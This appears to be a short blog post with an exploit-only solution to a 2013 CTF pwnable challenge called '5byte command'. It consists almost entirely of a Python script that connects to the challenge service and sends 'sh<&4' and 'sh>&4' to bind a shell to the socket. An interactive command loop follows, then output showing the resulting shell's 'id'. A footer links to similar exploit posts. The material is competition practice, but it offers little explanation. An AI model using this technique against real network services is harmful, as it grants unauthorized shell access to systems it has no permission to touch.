Category : Pwnables
|
Summary : 5byte command
Exploit
#!/usr/bin/python from socket import * HOST = "192.168.123.134" PORT = 7879 cmd = "" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) s.send("sh<&4") s.send("sh>&4\n") while 1: cmd = raw_input("$ ") if cmd == "exit": break else: s.send(cmd+"\n") print s.recv(1024) s.close() |
root@ubuntu:~/givemeshell# ./exploit.py $ id uid=1005(givemeshell) gid=1005(givemeshell) groups=1005(givemeshell) |
'CTF > 2013' 카테고리의 다른 글
Secuinside CTF 2013 Qual - 17. movie_talk (Exploit only) (0) | 2013.07.23 |
---|---|
Defcon CTF 2013 Qual chal exploits (0) | 2013.07.07 |
Defcon CTF 2013 Qual - shellcode4 (Exploit only) (0) | 2013.07.07 |
Defcon CTF 2013 Qual - shellcode3 (Exploit only) (0) | 2013.07.07 |
Defcon CTF 2013 Qual - shellcode2 (Exploit only) (0) | 2013.07.07 |